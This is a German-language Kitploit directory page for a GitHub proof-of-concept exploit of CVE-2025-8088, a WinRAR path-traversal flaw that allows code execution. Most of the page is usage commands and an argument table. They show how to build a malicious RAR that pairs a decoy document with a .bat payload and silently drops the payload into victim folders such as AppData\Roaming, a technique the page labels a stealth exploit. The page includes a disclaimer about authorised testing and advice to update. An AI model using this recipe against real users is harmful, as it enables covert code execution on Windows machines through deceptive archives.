Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8088 — Dieses PoC dient der autorisierten Untersuchung und Prüfung. CVE-2025-8088 wird aktiv ausgenutzt, und Missbrauch kann gegen Gesetze verstoßen oder Schaden verursachen. Aktualisieren Sie auf WinRAR 7.13+, um verdächtige RARs zu vermeiden. | Kitploit
Tools/GitHubGitHub/ghostn4444/cve-2025-8088
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungBinary-Exploitation
GitHubghostn4444/cve-2025-8088

CVE-2025-8088

Dieses PoC dient der autorisierten Untersuchung und Prüfung. CVE-2025-8088 wird aktiv ausgenutzt, und Missbrauch kann gegen Gesetze verstoßen oder Schaden verursachen. Aktualisieren Sie auf WinRAR 7.13+, um verdächtige RARs zu vermeiden.

Repository anzeigen
vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-8088

WinRAR: Pfad-Traversal, das beliebige Codeausführung ermöglicht (CVE-2025-8088)

CVE-2025-8088 PoC - Stealth Exploit - README Englisch (US)

CVE-2025-8088 PoC - Exploração Furtiva - README Portugiesisch (BR)

CVE-2025-8088 PoC – Exploit Oculto - README Spanisch (ES)

CVE-2025-8088 PoC – Переопределение входа - README Russisch (RU)

root@kitploit:~
Exploit_cve_2025_8088.ps1

root@kitploit:~
python poc.py 

PoC

📋 Erforderliche Argumente

⚙️ Optionale Argumente

🎯 Beispielverwendung

root@kitploit:~
# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"

# Full custom configuration
python poc.py \
  --decoy document.pdf \
  --payload script.bat \
  --drop "C:\Users\Victim\AppData\Roaming" \
  --rar "C:\Program Files\WinRAR\rar.exe" \
  --out malicious.rar \
  --workdir ./build \
  --placeholder_len 150 \
  --max_up 20

Offizieller GitHub-Link – Zuschreibung: sxyrxyy

Tool herunterladen
ArgumentBeschreibungBeispiel
--decoyPfad zur Tarn-Datei (wird erstellt, falls nicht vorhanden)resume.txt
--payloadPfad zur Nutzlast-Datei (wird erstellt, falls nicht vorhanden)payload.bat
--dropAbsoluter Pfad zum Zielverzeichnis, in das die Nutzlast extrahiert wirdC:\Users\Victim\Documents
ArgumentBeschreibungStandardwertAnmerkungen
--rarPfad zu rar.exeAutomatisch erkanntÜberprüft gängige Speicherorte und PATH
--outAusgabe-RAR-Dateinamepoc-cve-2025-8088.rarEndgültiges schädliches Archiv
--workdirArbeitsverzeichnis für temporäre DateienAktuelles Verzeichnis (.)
--placeholder_lenLänge des ADS-Platzhaltersmax(len(target_path), 128)Länger = zuverlässigerer Traversal
--max_upAnzahl der Elternverzeichnis-Traversierungen (..\)16Mindestens 8 empfohlen
--base_outZwischen-Basis-RAR-Dateiname<out>.base.rarTemporäre Datei, wird danach gelöscht